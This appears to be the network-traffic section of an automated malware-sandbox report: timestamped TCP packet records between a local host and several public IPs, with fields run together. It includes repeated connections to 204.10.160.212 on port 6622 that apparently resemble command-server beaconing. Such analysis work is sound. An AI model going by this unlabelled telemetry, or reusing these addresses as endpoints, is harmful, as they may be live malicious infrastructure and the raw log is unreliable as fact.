                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.411082029 CEST5022780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.456790924 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.462208986 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.462296009 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.462404013 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.462476015 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.468080997 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.468430996 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.694133043 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.699451923 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.699525118 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.699794054 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.699794054 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.705620050 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.705636978 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.948937893 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.949117899 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.949863911 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.950140953 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.954197884 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.971407890 CEST5023080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.977345943 CEST805023054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.977556944 CEST5023080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.977813005 CEST5023080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.977813005 CEST5023080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.983537912 CEST805023054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.983721018 CEST805023054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.159442902 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.159802914 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.159849882 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.159849882 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.164979935 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.285942078 CEST5023180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.291174889 CEST805023118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.293395996 CEST5023180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.011408091 CEST8050236172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.012793064 CEST5023680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.012793064 CEST5023680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.017741919 CEST8050236172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.132240057 CEST5023880192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.137311935 CEST8050238172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.138309956 CEST5023880192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.138309956 CEST5023880192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.138309956 CEST5023880192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.143450975 CEST8050238172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.143465042 CEST8050238172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.208118916 CEST502396622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.213182926 CEST662250239204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.213258982 CEST502396622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.217288971 CEST502396622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.222462893 CEST662250239204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.421608925 CEST5023880192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.577275991 CEST5024080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.582755089 CEST805024054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.582822084 CEST5024080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.584433079 CEST5024080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.584451914 CEST5024080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.589797974 CEST805024054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.589811087 CEST805024054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.354487896 CEST805023747.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.354543924 CEST805023747.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.354597092 CEST805023747.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.354635954 CEST5023780192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.354635954 CEST5023780192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.354635954 CEST5023780192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.355732918 CEST805024054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.355766058 CEST805024054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.355815887 CEST5024080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.355829954 CEST805024054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.355918884 CEST5024080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.356039047 CEST5024080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.359687090 CEST805023747.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.361579895 CEST805024054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.371045113 CEST5024180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.376149893 CEST805024144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.376215935 CEST5024180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.376349926 CEST5024180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.376368999 CEST5024180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.382726908 CEST805024144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.382817030 CEST805024144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.498409033 CEST5024280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.503551006 CEST805024244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.503706932 CEST5024280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.503922939 CEST5024280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.503952026 CEST5024280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.508940935 CEST805024244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.509150028 CEST805024244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.688770056 CEST662250239204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.688885927 CEST502396622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.688924074 CEST502396622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.694050074 CEST662250239204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.834728003 CEST805024144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.145534992 CEST662250249204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.322885036 CEST805024818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.323056936 CEST5024880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.323652983 CEST805024818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.323971033 CEST5024880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.328489065 CEST805024818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.388617992 CEST5025080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.394120932 CEST805025034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.394229889 CEST5025080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.394612074 CEST5025080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.394644976 CEST5025080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.399631977 CEST805025034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.400065899 CEST805025034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.427432060 CEST5025180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.432430983 CEST805025144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.433521032 CEST5025180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.433809996 CEST5025180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.433883905 CEST5025180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.438963890 CEST805025144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.439076900 CEST805025144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.909495115 CEST805025144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.909759045 CEST5025180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.909971952 CEST805025144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.910054922 CEST5025180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.914773941 CEST805025144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.929297924 CEST5025280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.934264898 CEST805025213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.934339046 CEST5025280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.934690952 CEST5025280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.934721947 CEST5025280192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.939548016 CEST805025213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.939593077 CEST805025213.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.152302027 CEST805025034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.152539015 CEST5025080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.152884007 CEST805025034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.152944088 CEST5025080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.157535076 CEST805025034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.316118002 CEST5025380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.321496964 CEST805025344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.321676016 CEST5025380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.321912050 CEST5025380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.321978092 CEST5025380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.326983929 CEST805025344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.327203035 CEST805025344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.637392998 CEST662250249204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.637453079 CEST502496622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.637510061 CEST502496622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.642724991 CEST662250249204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.789500952 CEST805025344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.789886951 CEST5025380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.790189028 CEST805025344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.790333986 CEST5025380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.794817924 CEST805025344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.939807892 CEST5025480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.944960117 CEST805025447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.945305109 CEST5025480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.945810080 CEST5025480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.333928108 CEST662250255204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.334453106 CEST805025818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.334646940 CEST805025913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.334656954 CEST805025913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.365937948 CEST5026080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.370853901 CEST805026044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.371839046 CEST5026080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.372041941 CEST5026080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.372041941 CEST5026080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.376894951 CEST805026044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.377398014 CEST805026044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.755276918 CEST502616622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.760416031 CEST662250261204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.760552883 CEST502616622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.764698029 CEST502616622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.769849062 CEST662250261204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.877648115 CEST805026044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.877886057 CEST5026080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.877942085 CEST805026044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.878154993 CEST5026080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.882977962 CEST805026044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.895486116 CEST5026280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.900542974 CEST805026234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.900610924 CEST5026280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.900774002 CEST5026280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.900954962 CEST5026280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.905909061 CEST805026234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.906555891 CEST805026234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.651237011 CEST805026234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.651884079 CEST805026234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.651931047 CEST5026280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.658266068 CEST5026280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.663938046 CEST805026234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.672339916 CEST805025913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.673080921 CEST805025913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.673118114 CEST5025980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.674334049 CEST5025980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.679403067 CEST805025913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.685199022 CEST5026380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.690042973 CEST805026318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.690098047 CEST5026380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.692245960 CEST5026480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.692888975 CEST5026380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.692913055 CEST5026380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.697415113 CEST805026418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.697532892 CEST5026480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.698052883 CEST5026480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.698132992 CEST805026318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.698144913 CEST5026480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.698380947 CEST805026318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.703439951 CEST805026418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.703988075 CEST805026418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.178961039 CEST805026418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.179152012 CEST805026418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.179167986 CEST5026480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.179208994 CEST5026480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.179868937 CEST805026318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.142709017 CEST502676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.142709017 CEST502676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.148035049 CEST662250267204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.179256916 CEST805027144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.179544926 CEST5027180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.183126926 CEST805027144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.183296919 CEST5027180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.195677996 CEST805027144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.204334021 CEST5027280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.210551977 CEST805027254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.210715055 CEST5027280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.210870028 CEST5027280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.210891962 CEST5027280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.216080904 CEST805027254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.216268063 CEST805027254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.551872969 CEST502736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.557198048 CEST662250273204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.557251930 CEST502736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.562125921 CEST502736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.567399025 CEST662250273204.10.160.212192.168.2.4
